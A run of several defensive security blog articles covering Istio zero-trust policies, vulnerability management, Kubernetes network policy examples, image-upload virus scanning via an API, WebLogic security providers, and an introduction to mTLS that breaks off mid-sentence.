cloud. Managing multicluster network policies has become tedious: Organizations deploy hundreds of services across multiple Kubernetes clusters and environments. Network policies are local to clusters and do not usually work for multiple clusters. They need a lot of customization and development to define and implement security and routing policies in the multicluster and multicloud traffic. Thus, configuring and managing consistent network policies and firewall rules for each service becomes an everlasting and frustrating process. Service-to-service connection is not inherently secure in K8s: By default, one service can talk to another service inside a cluster. So, if a service pod is hacked, an attacker can quickly hack other services in that cluster easily (also known as vector attack). Kubernetes does not provide out-of-the-box encryption or authentication for communication between pods or services. Although K8s offers additional security features like enabling mTLS, it is a complex process and has to be implemented manually for each service. Lack of visibility into the network traffic: If there is a security breach, the Ops and SRE team should be able to react to the incident faster. Poor real-time visibility into the network traffic across environments becomes a bottleneck for SREs to diagnose issues in time. This impedes their ability for incident response, which leads to high mean time for recovery (MTTR) and catastrophic security risks. In theory, a zero trust network (ZTN) philosophy solves all the above challenges. In practice, Istio service mesh can help Ops and SREs to implement ZTN and secure microservices across the cloud. How Istio Service Mesh Enables ZTN for Microservices Istio is a popular open-source service mesh implementation software that provides a way to manage and secure communication between microservices. Istio abstracts the network into a dedicated layer of infrastructure and provides visibility and control over all communication between microservices. Istio works by injecting an Envoy proxy (a small sidecar daemon) alongside each service in the mesh (refer to fig. B). Envoy is an L4 and L7 proxy that helps in ensuring security connections and network connectivity among the microservices, respectively. The Istio control plane allows users to manage all these Envoy proxies, such as directly defining and cascading security and network policies. Fig B: Istio using Envoy proxy to secure connection between services across clusters and clouds. Istio simplifies enforcing a ZTN environment for microservices across the cloud. Inspired by Gartner Zero Trust Network Access, I have outlined four pillars of zero trust network that can be implemented using Istio. Four pillars of zero trust network enforced by Istio service mesh. 1. Enforcing Authentication With Istio Security teams would be required to create authentication logic for each service to verify the identity of users (humans or machines) that sent requests. The process is necessary to ensure the trustworthiness of the user. In Istio, it can be done by configuring peer-to-peer and request authentication policies using PeerAuthentication and RequestAuthentication custom resources (CRDs): Peer authentication policies involve authenticating service-to-service communication using mTLS. That is, certificates are issued for both the client and server to verify the identity of each other.Below is a sample PeerAuthentication resource that enforces strict mTLS authentication for all workloads in the foo namespace: YAML apiVersion: security.istio.io/v1beta1 kind: PeerAuthentication metadata: name: default namespace: foo spec: mtls: mode: STRICT Request authentication policies involve the server ensuring whether the client is even allowed to make the request. Here, the client will attach JWT (JSON Web Token) to the request for server-side authentication.Below is a sample RequestAuthentication policy created in the foo namespace. It specifies that incoming requests to the my-app service must contain JWT that is issued, and verified using public keys by entities mentioned under jwtRules. YAML apiVersion: security.istio.io/v1beta1 kind: RequestAuthentication metadata: name: jwt-example namespace: foo spec: selector: matchLabels: app: my-app jwtRules: - issuer: "https://issuer.example.com" jwksUri: "https://issuer.example.com/keys" Both authentication policies are stored in Istio configuration storage. 2. Implementing Authorization With Istio Authorization is verifying whether the authenticated user is allowed to access a server (access control) and perform the specific action. Continuous authorization prevents malicious users from accessing services, which ensures their safety and integrity. AuthorizationPolicy is another Istio CRD that provides access control for services deployed in the mesh. It helps in creating policies to deny, allow, and also perform custom actions against an inbound request. Istio allows setting multiple policies with different actions for granular access control to the workloads. The following AuthorizationPolicy denies POST requests from workloads in the dev namespace to workloads in the foo namespace. YAML apiVersion: security.istio.io/v1beta1 kind: AuthorizationPolicy metadata: name: httpbin namespace: foo spec: action: DENY rules: - from: - source: namespaces: ["dev"] to: - operation: methods: ["POST"] 3. Multicluster and Multicloud Visibility With Istio Another important pillar of ZTN is network and service visibility. SREs and Ops teams would require real-time monitoring of traffic flowing between microservices across cloud and cluster boundaries. Having deep visibility into the network would help SREs quickly identify the root cause of anomalies, develop resolution, and restore the applications. Istio provides visibility into traffic flow and application health by collecting the following telemetry data from the mesh from the data and control plane. Logs: Istio collects all kinds of logs such as services logs, API logs, access logs, gateway logs, etc., which will help to understand the behavior of an application. Logs also help in faster troubleshooting and diagnosis of network incidents. Metrics: They help to understand the real-time performance of services for identifying anomalies and fine-tuning them in the runtime. Istio provides many metrics apart from the 4 golden ones, which are error rates, traffic, latency, and saturation. Distributed tracing: It is the tracing and visualizing of requests flowing through multiple services in a mesh. Distributed tracing helps understand interactions between microservices and provides a holistic view of service-to-service communication in the mesh. 4. Network Auditing With Istio Auditing is analyzing logs of a process over a period with the goal to optimize the overall process. Audit logs provide auditors with valuable insights into network activity, including details on each access, the methods used, traffic patterns, etc. This information is useful to understand the communication process in and out of the data center and public clouds. Istio provides information about who accessed (or requested), when, and onto what resources, which is important for auditors to investigate faulty situations. The information is required for the auditors to suggest steps to improve the overall performance of the network and security of cloud-native applications. Deploy Istio for a Better Security Posture The challenges around securing networks and data in a microservices architecture are going to be increasingly complex. Attackers are always ahead in finding vulnerabilities and exploiting them before anyone in the SRE team gets time to notice. Implementing a zero trust network will provide visibility and secure Kubernetes clusters from internal or external threats. Istio service mesh can lead this endeavor from the front, with its ability to implement zero trust out of the box.
Vulnerability management is a proactive approach to identifying, managing, and mitigating network vulnerabilities to improve the security of an enterprise's applications, software, and devices. It includes identifying vulnerabilities in IT assets, assessing risks, and taking appropriate action on systems and networks. Organizations worldwide invest in vulnerability management to protect systems and networks against security breaches and data theft. Often combined with risk management and other security measures, vulnerability management has become an integral part of today's computer and network security practices to prevent the exploitation of IT vulnerabilities, such as code and design flaws, to compromise the security of the entire enterprise network. The Importance of Vulnerability Management Despite the effectiveness of vulnerability management for many cybersecurity risks, organizations often overlook the implementation of robust vulnerability management processes, as evidenced by the sheer number of data breaches, and are, therefore, unknowingly compromised by patches and misconfigurations. Vulnerability management is designed to investigate an organization's security posture and detect such vulnerabilities before a malicious hacker discovers them. This is why implementing a vulnerability management program is essential for companies of all sizes. Powerful vulnerability management leverages threat intelligence and IT team knowledge to rank risks and respond quickly to security vulnerabilities. Four Stages of Vulnerability Management Several steps must be considered when creating a vulnerability management program. Incorporating these steps into the management process can help prevent the vulnerabilities from being overlooked. It can also correctly address any vulnerabilities found. Identify Vulnerabilities Vulnerability scanners are at the core of a standard vulnerability management solution. The scan consists of four stages. Scan systems that have access to the network by sending Ping or TCP/UDP packets. Identify open ports and services running on the scanned system. Log in to the system remotely and gather detailed system information. Associating System Information with Known Vulnerabilities Vulnerability scanners can identify various systems running on a network, including laptops, desktops, virtual and physical servers, databases, firewalls, switches, and printers. The recognized methods are investigated for various attributes, such as operating system, open port, installed software, user account, file system structure, and system configuration. This information is used to associate known vulnerabilities with the scanned system. To make this association, the vulnerability scanner uses a vulnerability database that contains a list of commonly known vulnerabilities. Evaluation Scans have discovered all the potential known cybersecurity vulnerabilities, so it's time to evaluate and prioritize them. The scan may have found thousands of possible weaknesses, some of which pose a greater risk than others. To sort them out, vulnerability assessments must be conducted to evaluate or score all vulnerabilities in terms of the threat to the company if they are exploited. Many systems can be used for prioritization, but Common Vulnerability Scoring System (CVSS) is one of the most referenced. It's essential to repeat this prioritization process every time you run a scan and discover new vulnerabilities to find those that are most critical to IT security. Vulnerability Remediation If the vulnerability is verified and identified as a risk, the next step is to prioritize how it should be handled among the primary stakeholders of the business and network. The vulnerability can be addressed in the following ways: Rectification: Either completely fix the vulnerability or apply a patch to prevent it from being exploited. It is the ideal treatment the organization is aiming for. Mitigation: Mitigate vulnerabilities to reduce the possibility and impact of a vulnerability Exploited. It may be necessary if appropriate fixes or patches are not provided for the identified vulnerabilities. This option is ideally used to allow time for an organization to fix the vulnerability eventually. Vulnerability managing solutions deliver advised remediation techniques for vulnerabilities. However, there may be better ways to repair the exposure than the recommended repair method. Reporting and Follow-Up Once you have addressed the published vulnerabilities, it's time to take advantage of the reporting tools in our vulnerability management solution. It gives the security team an overview of the effort required by each remediation technique. In addition, it allows them to determine the most efficient way to address the vulnerability issue in the future. Actions to take at this point include: Setting up patching tools. Scheduling automatic updates. Coordinating with your cyber-IT security staff. Setting up a ticketing system in case of a security issue. These reports can also be used to ensure compliance with any regulatory agency in the industry by showing the level of risk of a breach and the actions taken to reduce that risk. Cybercriminals are constantly evolving, so vulnerability management assessments must be conducted regularly to reduce the number of vulnerabilities and keep network security up to date. Ways to Integrate Security 1. Application security scan to secure CI/CD pipeline Continuous Integration and Continuous Delivery (CI/CD) pipelines are the foundation of every modern software organization that builds software. Combined with DevOps practices, the CI/CD pipeline allows your company to deliver software faster and more often. However, great power carries great responsibility. While everyone concentrates on writing secure applications, many people overlook the security of the CI/CD pipeline. However, there are legitimate reasons to pay close attention to the configuration of CI/CD. 2. Importance of CI/CD security CI/CD pipelines usually require a lot of permissions to do their job. You also need to deal with application and infrastructure secrets. Anyone with unauthorized access to the CI/CD pipeline has almost unlimited power to compromise all infrastructure or deploy malicious code. Therefore, securing the CI/CD pipeline should be a high-priority task. Unfortunately, statistics show that there has been a significant increase in attacks on the software supply chain in recent years. 3. Static Application Security Testing (SAST) Static Application Security Testing (SAST) complements SCA by assessing potential vulnerabilities in your source code. In other words, SCA can be based on a database of known vulnerabilities to identify vulnerabilities in third-party code. At the same time, SAST does its analysis of custom code to detect potential security issues such as improper input validation. In this way, by running SAST at the beginning of the CI/CD pipeline in addition to SCA, you can gain a second layer of protection against the risks inherent in your source code. 4. Vulnerability scanning Vulnerability scanning is an automated process that energetically determines network, application, and shield vulnerabilities. Vulnerability scans are typically performed by an organization's IT department or a third-party security service provider. Unfortunately, this scan is also served by attackers looking for entry points into the network. Scanning involves detecting and classifying system weaknesses in networks, communications equipment, and computers. Vulnerability scanning identifies security holes and predicts how effective measures are in the event of a threat or attack. In the vulnerability diagnosis service, the software is operated from the standpoint of a diagnosing side, and an attack target area to be diagnosed is diagnosed. The vulnerability scanner utilizes a database to correspond to the details of the targeted attack. The database references known defects, coding bugs, anomalies in packet construction, default settings, and routes to sensitive data that an attacker may exploit. 5. Software composition analysis (SCA) Software configuration analysis (SCA) is the process of automatically visualizing the use of open-source software (OSS) for risk management, security, and license compliance purposes. Open source (OS) is used by software across all industries, and the need to track components to protect companies from problems and open-source vulnerabilities is growing exponentially. However, since most software production involves operating systems, manual tracking is complex and requires automation to scan source code, binaries, and dependencies. SCA tools are becoming an integral part of application security, enabling organizations to use code scanning to discover evidence of OSS, to create an environment that reduces the cost of fixing vulnerabilities and licensing issues early, and to use automated scanning to find and fix problems with less effort. In addition, SCA continuously monitors security and vulnerability issues to manage workloads better and increase productivity, enabling users to create actionable alerts for new vulnerabilities in current and shipping products. 6. Dynamic Application Security Test (DAST) The DAST solution identifies potential input fields in your application and sends them various abnormal and malicious inputs. It can include an attempt to exploit common vulnerabilities, such as SQL injection commands, cross-site scripting (XSS) vulnerabilities, long input strings, and abnormal input that could reveal input validation and memory management issues within the application. The DAST tool identifies whether an application contains a specific vulnerability based on the application's response to various inputs. For example, if a SQL injection attack attempts to gain unauthorized access to data or an application crashes due to invalid or unauthorized input, this indicates an exploitable vulnerability. 7. Container Security The process of securing containers is continuous. It must be integrated into the development process and automated to reduce manual touchpoints and extend to maintaining and operating the underlying infrastructure. It means protecting the build pipeline's container image and runtime host, platform, and application layers. Implementing safety as part of the constant delivery lifecycle reduces risk and vulnerability to growing attacks in your business. Containers have security benefits, such as excellent application separability, but they also extend the scope of your organization's threats. A significant increase in the deployment of containers in a production environment makes them attractive targets for malicious actors and increases the system's workload. In addition, a single container that is vulnerable or compromised can be an entry point into the entire organization's environment. 8. Infrastructure Security Vulnerability scanning is a complex topic, and organizations evaluating vulnerability scanning solutions often need clarification. Infrastructure vulnerability scanning is the process of running a series of automated checks against a target or range of targets in the infrastructure to detect whether there are potentially malicious security vulnerabilities. A target is specified as a fully qualified domain name (FQDN) that resolves to one or more IP addresses, IP address ranges, or IP addresses to be scanned. An infrastructure vulnerability scan is performed across a network, such as the Internet. The scan runs on a dedicated scan hub and originates from it. The scan hub runs a scan engine to connect to the scanned target to evaluate the vulnerability. Conclusion Vulnerability management is a proactive approach to identifying, managing, and mitigating network vulnerabilities to improve the security of an enterprise's applications, software, and devices hosted in the cloud. It includes identifying vulnerabilities in IT assets, assessing risks, and taking appropriate action on systems and networks. Implementing a vulnerability management program is essential for companies of all sizes, as it leverages threat intelligence and IT team knowledge to rank risks and respond quickly to security vulnerabilities. The vulnerability management program consists of four stages: identifying vulnerabilities, evaluating them, remediating them, and reporting and follow-up. Integrating security measures, such as securing CI/CD pipelines, using vulnerability scanning tools, and implementing SCA, SAST, DAST, etc., can complement the vulnerability management program to provide a robust security approach.
As more applications are deployed in Kubernetes clusters, ensuring that traffic flows securely and efficiently between them becomes increasingly important. Kubernetes Network Policies are a powerful tool for controlling traffic flow at the IP address or port level, but implementing them effectively requires following best practices. In this article, we will explore ten best practices for using Kubernetes Network Policies to enhance the security and reliability of your applications. 1. Use Namespaces and Labels for Granular Policy Enforcement YAML apiVersion: networking.k8s.io/v1 kind: NetworkPolicy metadata: name: backend-policy namespace: backend spec: podSelector: matchLabels: app: backend ingress: - from: - podSelector: matchLabels: app: frontend In this example, we’re applying a Network Policy to the backend namespace, restricting traffic to pods with the label app: backend. We also allow traffic from pods with the label. app: frontend. 2. Use Default-Deny Policies to Enforce a Secure Environment YAML apiVersion: networking.k8s.io/v1 kind: NetworkPolicy metadata: name: default-deny spec: podSelector: {} policyTypes: - Ingress - Egress By default, Kubernetes allows all network traffic between pods. Using a default-deny policy can help you create a more secure environment by blocking all traffic unless it is explicitly allowed by a policy. In this example, we’re creating a Network Policy that denies all ingress and egress traffic by default. 3. Use IP Blocks to Restrict Traffic to Specific IP Addresses or Ranges YAML apiVersion: networking.k8s.io/v1 kind: NetworkPolicy metadata: name: restrict-external-access spec: podSelector: matchLabels: app: backend egress: - to: - ipBlock: cidr: 192.168.0.0/16 In this example, we’re creating a Network Policy that restricts egress traffic from pods with the label app: backend to the IP range 192.168.0.0/16. 4. Use Port-Based Policies to Control Traffic to Specific Ports YAML apiVersion: networking.k8s.io/v1 kind: NetworkPolicy metadata: name: restrict-http-access spec: podSelector: matchLabels: app: backend ingress: - from: - podSelector: matchLabels: app: frontend ports: - protocol: TCP port: 80 In this example, we’re creating a Network Policy that allows ingress traffic from pods with the label app: frontend to the pods with the label app: backend on port 80. 5. Use Labels to Apply Multiple Policies to the Same Pods YAML apiVersion: networking.k8s.io/v1 kind: NetworkPolicy metadata: name: policy1 spec: podSelector: matchLabels: app: backend ingress: - from: - podSelector: matchLabels: app: frontend ports: - protocol: TCP port: 80 --- apiVersion: networking.k8s.io/v1 kind: NetworkPolicy metadata: name: policy2 spec: podSelector: matchLabels: app: backend ingress: - from: - podSelector: matchLabels: app: frontend ports: - protocol: TCP port: 443 In this example, we’re creating two Network Policies that allow ingress traffic from pods with the label app: frontend to pods with the label app: backend. One policy allows traffic on port 80, while the other allows traffic on port 443. 6. Use Namespaces to Create Isolation Boundaries YAML apiVersion: networking.k8s.io/v1 kind: NetworkPolicy metadata: name: isolate-frontend namespace: frontend spec: podSelector: {} policyTypes: - Ingress ingress: - from: - namespaceSelector: matchLabels: name: backend In this example, we’re creating a Network Policy in the frontend namespace that restricts ingress traffic to pods in the backend namespace. 7. Use Network Policies to Enforce Compliance Requirements YAML apiVersion: networking.k8s.io/v1 kind: NetworkPolicy metadata: name: restrict-sensitve-data-access spec: podSelector: matchLabels: app: sensitive-data ingress: - from: - podSelector: matchLabels: app: trusted-app ports: - protocol: TCP port: 443 In this example, we’re creating a Network Policy that only allows ingress traffic from pods with the label app: trusted-app to the pods with the label app: sensitive-data on port 443. 8. Use Network Policies to Improve Application Security YAML apiVersion: networking.k8s.io/v1 kind: NetworkPolicy metadata: name: restrict-access spec: podSelector: matchLabels: app: backend ingress: - from: - ipBlock: cidr: 10.10.0.0/24 ports: - protocol: TCP port: 80 In this example, we’re creating a Network Policy that only allows ingress traffic from IP addresses within the 10.10.0.0/24 CIDR block to the pods with the label app: backend on port 80. 9. Understand and Document the Traffic Flow Before creating network policies, it is essential to understand and document how traffic flows within your cluster. This will help you identify which pods need to communicate with each other and which pods should be isolated. 10. Document Your Policies Document your network policies, including the purpose, rules, and expected behavior. This will help you and other developers understand how traffic flows within your cluster. Conclusion In conclusion, Kubernetes Network Policies provide a powerful means of controlling traffic flow at the IP address or port level in your Kubernetes cluster. By following the best practices outlined in this article, you can ensure that your policies are effective and reliable and enhance the security of your applications. Remember to regularly review and update your policies as your environment changes to ensure that they remain effective. By doing so, you can help to safeguard your applications and data and provide a more secure and efficient experience for your users. With these best practices in mind, you can confidently deploy and manage your applications in Kubernetes with the added peace of mind that comes from knowing your network traffic is secured.
Direct image upload processes create a highly efficient path between client-side users and a website’s underlying file storage instances, significantly benefiting both ends of the client/web service relationship. Due largely to the ever-increasing availability (and affordability) of cloud storage resources for independent developer projects and small business ventures, we see the option to upload our own image files more and more frequently everywhere we look online, growing in tandem with steady demand for new forms of social engagement and commerce. The trouble is, however, that file upload security is a very serious issue - and image files are rather easily exploited by client-side threat actors. Image files aren’t unique in this respect, of course (many common file formats including PDF, DOCX, etc., for example, can house a variety of hidden threats), but their monumental value on the internet – a mostly visual platform – sets them apart as one of the more expedient vessels for malicious content. Attackers can easily inject malware and other malicious code directly into image files using honed steganographic techniques, reliably avoiding detection from poorly configured upload security policies. Malware can be hidden in several different ways within an image file – bluntly appended to the end of a file, subtly incorporated through minor code changes, or even concealed in the image’s metadata or EXIF data. Malicious code is generally designed to execute remotely or upon file opening, meaning dormant, undetected threats in storage can wait days, weeks, or even months before suddenly unleashing dangerous content. It isn’t just the website’s system they can exploit, too: if an unsuspecting client-side user downloads an infected file, their device can be quickly compromised, badly (perhaps permanently) damaging the website’s reputation. Mitigating image file upload threats starts with implementing powerful virus and malware detection policies, and it also involves putting sensible file upload validation measures in place. Unusually large image files, for example, might indicate a hidden threat, so understanding (and possibly standardizing) the size of image uploads can help facilitate quicker threat detection. Moreover, limiting the number of different file extensions allowed for upload (for example, limiting to PNG or JPG) makes file extension validation easier and more efficient to carry out. File extensions and headers shouldn’t be trusted blindly, either – thorough content verification should always take the file structure and file encoding into consideration. Demonstration In the remainder of this article, I’ll demonstrate two simple, free-to-use solutions which can help virus scan and validate image file uploads prior to reaching cloud storage. Both can be taken advantage of efficiently using complementary, ready-to-run Java code examples to structure your API calls. These APIs perform the following functions respectively: Scan image files for viruses Validate image files Used in conjunction with one another, both APIs can help ensure image uploads are valid and free of viruses and malware, significantly mitigating the risks associated with direct image file uploads. Scan an Image File for Viruses This API is equipped with more than 17 million virus and malware signatures, covering extremely common threats like trojans, ransomware, and spyware among others. It isn’t limited to image files either (you can also scan documents like PDF, DOCX, XLSX, etc.), so it offers some versatility if your file upload process accepts multiple file types. All scanned files will ultimately receive a "CleanResult: True" or "CleanResult: False" Boolean response; if false, the name of the detected virus will be provided in the API response. To install the client SDK, first, add a reference to the repository in your Maven POM File. Jitpack is used to dynamically compile the library: XML <repositories> <repository> <id>jitpack.io</id> <url>https://jitpack.io</url> </repository> </repositories> After that, add a reference to the dependency: XML <dependencies> <dependency> <groupId>com.github.Cloudmersive</groupId> <artifactId>Cloudmersive.APIClient.Java</artifactId> <version>v4.25</version> </dependency> </dependencies> With installation out of the way, you can structure your API call using the following complementary code examples: Java // Import classes: //import com.cloudmersive.client.invoker.ApiClient; //import com.cloudmersive.client.invoker.ApiException; //import com.cloudmersive.client.invoker.Configuration; //import com.cloudmersive.client.invoker.auth.*; //import com.cloudmersive.client.ScanApi; ApiClient defaultClient = Configuration.getDefaultApiClient(); // Configure API key authorization: Apikey ApiKeyAuth Apikey = (ApiKeyAuth) defaultClient.getAuthentication("Apikey"); Apikey.setApiKey("YOUR API KEY"); // Uncomment the following line to set a prefix for the API key, e.g. "Token" (defaults to null) //Apikey.setApiKeyPrefix("Token"); ScanApi apiInstance = new ScanApi(); File inputFile = new File("/path/to/inputfile"); // File | Input file to perform the operation on. try { VirusScanResult result = apiInstance.scanFile(inputFile); System.out.println(result); } catch (ApiException e) { System.err.println("Exception when calling ScanApi#scanFile"); e.printStackTrace(); } When testing this solution, I’d recommend thoroughly researching options for inert files that can safely trigger a "CleanResult: False" response (Eicar files, for example, are often a popular choice in this regard). Validate an Image File This API is designed to rigorously validate dozens of common input image types, including JPG, PNG, WEBP, GIF, and many more. It’ll identify whether the content contained within an image upload matches its extension, whether the file is password protected, and if there are any errors and warnings present within the file. If any errors are detected, the API response will provide a description of the error, a path to the error, and a URI for reference. You can install this client SDK the same way as before. Add this reference to your Maven POM file repository: XML <repositories> <repository> <id>jitpack.io</id> <url>https://jitpack.io</url> </repository> </repositories> Then add a reference to the dependency: XML <dependencies> <dependency> <groupId>com.github.Cloudmersive</groupId> <artifactId>Cloudmersive.APIClient.Java</artifactId> <version>v4.25</version> </dependency> </dependencies> Finally, you can structure your API call using the ready-to-run code examples below: Java // Import classes: //import com.cloudmersive.client.invoker.ApiClient; //import com.cloudmersive.client.invoker.ApiException; //import com.cloudmersive.client.invoker.Configuration; //import com.cloudmersive.client.invoker.auth.*; //import com.cloudmersive.client.ValidateDocumentApi; ApiClient defaultClient = Configuration.getDefaultApiClient(); // Configure API key authorization: Apikey ApiKeyAuth Apikey = (ApiKeyAuth) defaultClient.getAuthentication("Apikey"); Apikey.setApiKey("YOUR API KEY"); // Uncomment the following line to set a prefix for the API key, e.g. "Token" (defaults to null) //Apikey.setApiKeyPrefix("Token"); ValidateDocumentApi apiInstance = new ValidateDocumentApi(); File inputFile = new File("/path/to/inputfile"); // File | Input file to perform the operation on. try { DocumentValidationResult result = apiInstance.validateDocumentImageValidation(inputFile); System.out.println(result); } catch (ApiException e) { System.err.println("Exception when calling ValidateDocumentApi#validateDocumentImageValidation"); e.printStackTrace(); }
WebLogic Server is a Java-based application server, and it provides a platform for deploying and managing distributed applications and services. It is a part of the Oracle Fusion Middleware family of products and is designed to support large-scale, mission-critical applications. WebLogic Server provides a Security Framework that includes a default Security Provider, which provides authentication, authorization, and auditing services to protect resources such as applications, EJBs, and web services. However, you can also use security plug-ins or custom security providers to extend the security framework to meet your specific security requirements. Here is a brief explanation of the security plug-ins and custom security providers in WebLogic Server: Security Plug-in: A security plug-in is a WebLogic Server component that provides authentication and authorization services for external security providers. It allows you to integrate third-party security products with WebLogic Server. The security plug-in communicates with the external security provider using the Simple and Protected GSSAPI Negotiation Mechanism (SPNEGO) protocol. You can configure the security plug-in using the WebLogic Server Administration Console or the command-line interface. Custom Security Providers: WebLogic Server provides several security providers such as the default security provider, LDAP security provider, and RDBMS security provider. However, if these security providers do not meet your security requirements, you can develop custom security providers. Custom security providers allow you to extend the security framework to meet your specific security needs. You can develop custom security providers using the WebLogic Server API or the Security Provider APIs. The development of custom security providers requires expertise in Java programming, and it is recommended that you test the custom security providers thoroughly before deploying them to a production environment. Security plug-ins and custom security providers allow you to extend the WebLogic Server Security Framework to meet your specific security requirements. You can use the WebLogic Server Administration Console or the command-line interface to configure security plug-ins and develop custom security providers. WebLogic Server provides several features to protect your resources, such as applications, EJBs, and web services. Here are some ways to implement resource protection in WebLogic Server from unauthorized access: Authentication: Authorization: SSL/TLS: Network Access Control: Firewall: Secure Sockets Layer Acceleration: WebLogic Server provides a security framework that allows you to protect your resources, such as applications, EJBs, and web services. You can configure the security plug-in or custom security providers for resource protection in WebLogic Server by following these steps: Determine the security requirements: Before configuring the security plug-in or custom security providers, you need to determine the security requirements for your application. This includes identifying the authentication and authorization requirements. Configure the security realm: The security realm is the foundation of the WebLogic Server security framework. You need to configure the security realm with the necessary users, groups, and roles. You can use the WebLogic Administration Console or the WLST scripting tool to configure the security realm. Configure the security providers: WebLogic Server provides several security providers, including the default security provider, LDAP security provider, and RDBMS security provider. Configure the security plug-in: The security plug-in is a WebLogic Server component that provides authentication and authorization services to protect your resources. You can configure the security plug-in using the WebLogic Administration Console or the WLST scripting tool. Configure custom security providers: If the default security providers do not meet your security requirements, you can develop custom security providers. You can develop custom security providers using the WebLogic Server API or the Security Provider APIs. Test the security configuration: After configuring the security plug-in or custom security providers, you should test the security configuration thoroughly to ensure that it is working as expected. Monitor the security configuration: It is important to monitor the security configuration to ensure that it is running smoothly. This includes monitoring security logs, error logs, and other important metrics. Following these steps, you can configure the security plug-in or custom security providers for resource protection in WebLogic Server.
This is a detailed guide on mTLS and how to implement it with Istio service mesh. We will be covering the following topics here: Understanding mTLS protocol wrt TCP/IP suite SSL vs TLS vs mTLS Why is mTLS important? Use-cases of mTLS Certificate Authority, Publick keys, X.509 certificate: Must-know mTLS concepts How does mTLS work? How to enable mTLS with Istio service mesh Certificate management for mTLS in Istio What Is mTLS? Mutual Transport Layer Security (mTLS) is a cryptographic protocol designed to authenticate two parties and secure their communication in the network. mTLS protocol is an extension of TLS protocol where both the parties- web client and web server- are authenticated. The primary aim of mTLS is to achieve the following: Authenticity: To ensure both parties are authentic and verified Confidentiality: To secure the data in the transmission Integrity: To ensure the correctness of the data being sent mTLS protocol: A Part of the TCP/IP Suite mTLS protocol sits between the application and transport layers to encrypt only messages (or packets). It can be seen as an enhancement to the TCP protocol. The below diagram conceptually provides the location of mTLS in the TCP/IP protocol suite. SSL vs TLS vs mTLS: Which Is New? Security engineers, architects, and developers use SSL, TLS, and mTLS interchangeably, often because of their similarity. Loosely mentioning, mTLS is an enhancement to TLS, and TLS is an enhancement to SSL. The first version of Secure Socket Layer (SSL) was developed by Netscape corporate in 1994; the most popular versions were versions 2 and 3- created in 1995. It was so widely popular that it made its way into one of the James Bond movies (below is the sneak-peak of Tomorrow Never Dies, 1997). The overall working of SSL is carried by three sub-protocol: Handshake protocol: This is used to authenticate the web client and the web server and establish a secured communication channel. In the handshaking process, a shared key will be generated, for the session only, to encrypt the data during communication. Record protocol: This protocol helps to maintain the confidentiality of data in the communication between the client and the server using a newly generated shared secret key. Alert protocol: In case the client or the server detects an error, the alert protocol would close the SSL connection ( the transmission of data will be terminated); destroying all the sessions, shared keys, etc. As there were more internet applications, the requirement for fine-grain security of the data in the network was more. So Transport Layer Security (TLS) - a standard internet version of SSL - was developed by IETF. Netscape handed over the SSL project to IETF, and TLS is an advanced version of SSL; the code idea and implementation of the protocol are the same. The main difference between the SSL and TLS protocols is that the cipher suite (or the algorithms) used to encrypt data in TLS is advanced. Secondly, the handshake, record, and alert protocols are modified and optimized for internet usage. Note: In the SSL handshake protocol, the server authentication to the client by sending the certificate was mandatory, but the client's authentication was optional to secure the line. But in TLS, there was only a provision to authenticate we-servers to the client, not vice-versa. Almost all the websites you visit with HTTPS as the protocol will use TLS certificates to establish themselves as genuine sites. If you visit Google.com and click the padlock symbol, it will show the TLS certificates. The TLS was mainly used for web applications with the client being the user. Additionally, ensuring the authentication of billions of clients or users is only feasible for some web applications. But as the large monolithic applications broke into numerous microservices that communicate over the internet, the need for mTLS grew suddenly. mTLS protocol ensures both the web client and the web server authenticate themselves before a handshake. (We will see the working model of the mTLS protocol later in this article). Why Is mTLS More Important Than Ever? Modern business is done using web applications whose underlying architecture follows a hybrid cloud model. Microservices will be distributed across public/private clouds, Kubernetes, and on-prem VMs. And the communication among various microservices and components happens over the network, posing a significant risk of hacking or malicious attacks. Below are a few scenarios of cyber-attacks on the web that can be avoided entirely by using mTLS protocols. Man-in-the-middle attack (MITM): Attackers can place themselves between a client and a server to intercept the data during the transmission. When mTLS is used, attackers cannot authenticate themselves and will fail to steal the data. IP Spoofing: Another case is when bad guys masquerade as someone you trust and injects malicious packets into the receiver. This is again solved by end-point authentication in mTLS to determine with certainty if network packets or the data originates from a source we trust. Packet Sniffer: The attacker can place a passive receiver near the wireless transmitter to obtain a copy of every packet transmitted. Such an attack is prevalent in banking and Fintech domains when an attacker wants to steal sensitive information such as card numbers, banking application usernames, passwords, SSNs, etc. Since packet sniffing is non-intrusive, it is tough to detect. Hence the best way to protect data is to involve cryptography. mTLS helps encrypt the data using complex cryptographic algorithms that are hard to decipher by packet sniffers. Denial-of-service (DoS) attacks: The attackers aim to make the network or the web server unusable by legitimate applications or users. This is done by sending vulnerable packets, or deluge to packets, or by opening a large number of TCP connections to the hosts (or the web server) so that the server ultimately crashes. DoS and Distributed DoS (advanced DoS technique) can be avoided by invoking mTLS protocols in the applicable communication. All the malicious DoS attacks will be discarded before entering into the handshake phase. Use Cases of mTLS in the Industry The use cases of mTLS are growing daily with the increasing usage of business through web applications and the simultaneous rise in threats of cyberattacks. Here are a few important use cases based on our experiences while discussing with many leaders from various industries or domains- banking, fintech, and online retail companies. Hybrid cloud and multicloud applications: Whenever organizations use a mix of data centers — on-prem, public, or private cloud — the data leaves the secured perimeter and goes out of the network. In such cases, mTLS should be used to protect the data. Microservices-based B2B software: Many B2B software in the market follows a microservices architecture. Each service would talk to the other using REST APIs. Even though all the services are hosted in a single data center, the network should be secured to protect the data in transit (in case the firewall is breached). Online retail and e-commerce application: Usually, e-commerce and online retail applications use Content Delivery Network (CDN) to fetch the application from the server and show it to users. Although TLS is implemented in the CDN to authenticate itself when a user visits the page, there should be a security mechanism to secure the network between the CDN and the web server through mTLS. Banking applications: Applications that carry susceptible transactions, such as banks, financial transaction apps, payment gateways, etc., should take extreme precautions to prevent their data from getting stolen. Millions of online transactions happen every day using various banking and fintech apps. Sensitive information such as bank usernames, passwords, debit/credit card details, CVV numbers, etc., can be easily hacked if the data in the network is not protected. Strict authentication and confidentiality can be applied to the network using mTLS. Industry regulation and compliance: Every country will have some rules and standards to govern the IT infrastructure and protect the data. All the policies, such as FIPS, GDPR, PCI-DSS, HIPAA, ISO27001, etc., outline strict security measures to protect the data-at-rest and data-in-transit. For strict authentication in the network, mTLS can be used, and companies can adhere to various standards. Below are the few concepts one needs to be aware of before understanding the mechanism of how mTLS works. (You can skip reading if you are comfortable.) Certificates and Public/Private Keys: Must-Know mTLS Concepts Certificates A (digital) certificate is a small computer file issued by a certificate authority (CA) to authenticate a user, an application, or an organization. A digital certificate contains information such as- the name of the certificate holder, serial number of the certificate, expiry date, public key, and signature of the certificate issuing authority. Certificate Authority (CA) A certificate authority (CA) is a trusted 